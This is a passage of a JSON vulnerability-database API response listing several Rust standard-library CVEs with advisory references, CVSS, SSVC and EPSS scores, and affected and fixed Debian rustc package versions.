"https://blog.rust-lang.org/2022/01/20/cve-2022-21658.html" }, { "reference_url": "https://github.com/rust-lang/rust/security/advisories/GHSA-r9cc-f5pr-p3j2", "reference_id": "GHSA-r9cc-f5pr-p3j2", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/" } ], "url": "https://github.com/rust-lang/rust/security/advisories/GHSA-r9cc-f5pr-p3j2" }, { "reference_url": "https://security.gentoo.org/glsa/202210-09", "reference_id": "GLSA-202210-09", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/" } ], "url": "https://security.gentoo.org/glsa/202210-09" }, { "reference_url": "https://support.apple.com/kb/HT213182", "reference_id": "HT213182", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/" } ], "url": "https://support.apple.com/kb/HT213182" }, { "reference_url": "https://support.apple.com/kb/HT213183", "reference_id": "HT213183", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/" } ], "url": "https://support.apple.com/kb/HT213183" }, { "reference_url": "https://support.apple.com/kb/HT213186", "reference_id": "HT213186", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/" } ], "url": "https://support.apple.com/kb/HT213186" }, { "reference_url": "https://support.apple.com/kb/HT213193", "reference_id": "HT213193", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/" } ], "url": "https://support.apple.com/kb/HT213193" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2022:1894", "reference_id": "RHSA-2022:1894", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2022:1894" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/938937?format=api", "purl": "pkg:deb/debian/rustc@1.57.0%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.57.0%252Bdfsg1-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938925?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938929?format=api", "purl": "pkg:deb/debian/rustc@1.85.0%2Bdfsg3-1?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.85.0%252Bdfsg3-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938928?format=api", "purl": "pkg:deb/debian/rustc@1.92.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.92.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1059655?format=api", "purl": "pkg:deb/debian/rustc@1.93.1%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.93.1%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1067629?format=api", "purl": "pkg:deb/debian/rustc@1.94.1%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.94.1%252Bdfsg1-1%3Fdistro=trixie" } ], "aliases": [ "CVE-2022-21658" ], "risk_score": 3.3, "exploitability": "0.5", "weighted_severity": "6.6", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-j9kg-rd4y-y7by" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/92703?format=api", "vulnerability_id": "VCID-jnv2-zv2x-8yc5", "summary": "In the standard library in Rust before 1.2.0, BinaryHeap is not panic-safe. The binary heap is left in an inconsistent state when the comparison of generic elements inside sift_up or sift_down_range panics. This bug leads to a drop of zeroed memory as an arbitrary type, which can result in a memory safety violation.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2015-20001", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50792", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50847", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50873", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50831", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50888", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50886", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50928", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50907", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.5089", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50934", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50914", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.50862", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.5087", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00274", "scoring_system": "epss", "scoring_elements": "0.5083", "published_at": "2026-04-29T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2015-20001" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-20001", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-20001" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/938926?format=api", "purl": "pkg:deb/debian/rustc@1.2.0%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.2.0%252Bdfsg1-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938927?format=api", "purl": "pkg:deb/debian/rustc@1.48.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4khp-kevq-xff5" }, { "vulnerability": "VCID-69zd-gcvx-fuhr" }, { "vulnerability": "VCID-7ap9-xghv-dbdy" }, { "vulnerability": "VCID-d8yv-ngej-1kf7" }, { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-f4bw-5erp-4uc6" }, { "vulnerability": "VCID-fu46-5dhv-ckdt" }, { "vulnerability": "VCID-j9kg-rd4y-y7by" }, { "vulnerability": "VCID-pbjz-th4w-tqgb" }, { "vulnerability": "VCID-pvm9-wtbx-1ubx" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" }, { "vulnerability": "VCID-wdu6-3vph-aqb7" }, { "vulnerability": "VCID-wpe1-jr23-duhh" }, { "vulnerability": "VCID-y25s-c64z-57a6" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.48.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938925?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938929?format=api", "purl": "pkg:deb/debian/rustc@1.85.0%2Bdfsg3-1?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.85.0%252Bdfsg3-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938928?format=api", "purl": "pkg:deb/debian/rustc@1.92.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.92.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1059655?format=api", "purl": "pkg:deb/debian/rustc@1.93.1%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.93.1%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1067629?format=api", "purl": "pkg:deb/debian/rustc@1.94.1%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.94.1%252Bdfsg1-1%3Fdistro=trixie" } ], "aliases": [ "CVE-2015-20001" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jnv2-zv2x-8yc5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/76924?format=api", "vulnerability_id": "VCID-mwu8-vn8b-rfb3", "summary": "rust: Fail to Escape Arguments Properly in Microsoft Windows", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-24576.json", "reference_id": "", "reference_type": "", "scores": [], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-24576.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-24576", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.79212", "scoring_system": "epss", "scoring_elements": "0.99058", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.79212", "scoring_system": "epss", "scoring_elements": "0.99075", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.79212", "scoring_system": "epss", "scoring_elements": "0.99074", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.79212", "scoring_system": "epss", "scoring_elements": "0.99071", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.79212", "scoring_system": "epss", "scoring_elements": "0.9907", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.79212", "scoring_system": "epss", "scoring_elements": "0.99069", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.79212", "scoring_system": "epss", "scoring_elements": "0.99068", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.79212", "scoring_system": "epss", "scoring_elements": "0.99066", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.79212", "scoring_system": "epss", "scoring_elements": "0.99065", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.79212", "scoring_system": "epss", "scoring_elements": "0.99064", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.79212", "scoring_system": "epss", "scoring_elements": "0.99062", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.80539", "scoring_system": "epss", "scoring_elements": "0.99141", "published_at": "2026-04-29T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-24576" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2024/04/09/16", "reference_id": "16", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-05-18T04:00:45Z/" } ], "url": "http://www.openwall.com/lists/oss-security/2024/04/09/16" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2265585", "reference_id": "2265585", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2265585" }, { "reference_url": "https://doc.rust-lang.org/std/io/enum.ErrorKind.html#variant.InvalidInput", "reference_id": "enum.ErrorKind.html#variant.InvalidInput", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-05-18T04:00:45Z/" } ], "url": "https://doc.rust-lang.org/std/io/enum.ErrorKind.html#variant.InvalidInput" }, { "reference_url": "https://github.com/rust-lang/rust/security/advisories/GHSA-q455-m56c-85mh", "reference_id": "GHSA-q455-m56c-85mh", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-05-18T04:00:45Z/" } ], "url": "https://github.com/rust-lang/rust/security/advisories/GHSA-q455-m56c-85mh" }, { "reference_url": "https://github.com/rust-lang/rust/issues", "reference_id": "issues", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-05-18T04:00:45Z/" } ], "url": "https://github.com/rust-lang/rust/issues" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/N323QAEEUVTJ354BTVQ7UB6LYXUX2BCL/", "reference_id": "N323QAEEUVTJ354BTVQ7UB6LYXUX2BCL", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-05-18T04:00:45Z/" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/N323QAEEUVTJ354BTVQ7UB6LYXUX2BCL/" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RPH3PF7DVSS2LVIRLW254VWUPVKJN46P/", "reference_id": "RPH3PF7DVSS2LVIRLW254VWUPVKJN46P", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-05-18T04:00:45Z/" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RPH3PF7DVSS2LVIRLW254VWUPVKJN46P/" }, { "reference_url": "https://doc.rust-lang.org/std/process/struct.Command.html", "reference_id": "struct.Command.html", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-05-18T04:00:45Z/" } ], "url": "https://doc.rust-lang.org/std/process/struct.Command.html" }, { "reference_url": "https://doc.rust-lang.org/std/process/struct.Command.html#method.arg", "reference_id": "struct.Command.html#method.arg", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-05-18T04:00:45Z/" } ], "url": "https://doc.rust-lang.org/std/process/struct.Command.html#method.arg" }, { "reference_url": "https://doc.rust-lang.org/std/process/struct.Command.html#method.args", "reference_id": "struct.Command.html#method.args", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-05-18T04:00:45Z/" } ], "url": "https://doc.rust-lang.org/std/process/struct.Command.html#method.args" }, { "reference_url": "https://doc.rust-lang.org/std/os/windows/process/trait.CommandExt.html#tymethod.raw_arg", "reference_id": "trait.CommandExt.html#tymethod.raw_arg", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-05-18T04:00:45Z/" } ], "url": "https://doc.rust-lang.org/std/os/windows/process/trait.CommandExt.html#tymethod.raw_arg" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W7WRFOIAZXYUPGXGR5UEEW7VTTOD4SZ3/", "reference_id": "W7WRFOIAZXYUPGXGR5UEEW7VTTOD4SZ3", "reference_type": "", "scores": [ { "value": "10", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-05-18T04:00:45Z/" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W7WRFOIAZXYUPGXGR5UEEW7VTTOD4SZ3/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/938935?format=api", "purl": "pkg:deb/debian/rustc@0?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@0%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938927?format=api", "purl": "pkg:deb/debian/rustc@1.48.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4khp-kevq-xff5" }, { "vulnerability": "VCID-69zd-gcvx-fuhr" }, { "vulnerability": "VCID-7ap9-xghv-dbdy" }, { "vulnerability": "VCID-d8yv-ngej-1kf7" }, { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-f4bw-5erp-4uc6" }, { "vulnerability": "VCID-fu46-5dhv-ckdt" }, { "vulnerability": "VCID-j9kg-rd4y-y7by" }, { "vulnerability": "VCID-pbjz-th4w-tqgb" }, { "vulnerability": "VCID-pvm9-wtbx-1ubx" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" }, { "vulnerability": "VCID-wdu6-3vph-aqb7" }, { "vulnerability": "VCID-wpe1-jr23-duhh" }, { "vulnerability": "VCID-y25s-c64z-57a6" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.48.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938925?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938929?format=api", "purl": "pkg:deb/debian/rustc@1.85.0%2Bdfsg3-1?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.85.0%252Bdfsg3-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938928?format=api", "purl": "pkg:deb/debian/rustc@1.92.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.92.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1059655?format=api", "purl": "pkg:deb/debian/rustc@1.93.1%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.93.1%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1067629?format=api", "purl": "pkg:deb/debian/rustc@1.94.1%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.94.1%252Bdfsg1-1%3Fdistro=trixie" } ], "aliases": [ "CVE-2024-24576" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-mwu8-vn8b-rfb3" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/31472?format=api", "vulnerability_id": "VCID-pbjz-th4w-tqgb", "summary": "Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28879.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28879.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-28879", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.011", "scoring_system": "epss", "scoring_elements": "0.77984", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.011", "scoring_system": "epss", "scoring_elements": "0.78123", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.011", "scoring_system": "epss", "scoring_elements": "0.78102", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.011", "scoring_system": "epss", "scoring_elements": "0.78109", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.011", "scoring_system": "epss", "scoring_elements": "0.77992", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.011", "scoring_system": "epss", "scoring_elements": "0.78022", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.011", "scoring_system": "epss", "scoring_elements": "0.78004", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.011", "scoring_system": "epss", "scoring_elements": "0.7803", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.011", "scoring_system": "epss", "scoring_elements": "0.78035", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.011", "scoring_system": "epss", "scoring_elements": "0.78061", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.011", "scoring_system": "epss", "scoring_elements": "0.78044", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.011", "scoring_system": "epss", "scoring_elements": "0.78041", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.011", "scoring_system": "epss", "scoring_elements": "0.78077", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.011", "scoring_system": "epss", "scoring_elements": "0.78075", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.011", "scoring_system": "epss", "scoring_elements": "0.78069", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-28879" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28879", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28879" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1949211", "reference_id": "1949211", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1949211" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803", "reference_id": "986803", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803" }, { "reference_url": "https://security.archlinux.org/AVG-1801", "reference_id": "AVG-1801", "reference_type": "", "scores": [ { "value": "Medium", "scoring_system": "archlinux", "scoring_elements": "" } ], "url": "https://security.archlinux.org/AVG-1801" }, { "reference_url": "https://security.gentoo.org/glsa/202210-09", "reference_id": "GLSA-202210-09", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/202210-09" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:3042", "reference_id": "RHSA-2021:3042", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:3042" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:3063", "reference_id": "RHSA-2021:3063", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:3063" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/938936?format=api", "purl": "pkg:deb/debian/rustc@1.53.0%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.53.0%252Bdfsg1-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938925?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938929?format=api", "purl": "pkg:deb/debian/rustc@1.85.0%2Bdfsg3-1?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.85.0%252Bdfsg3-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938928?format=api", "purl": 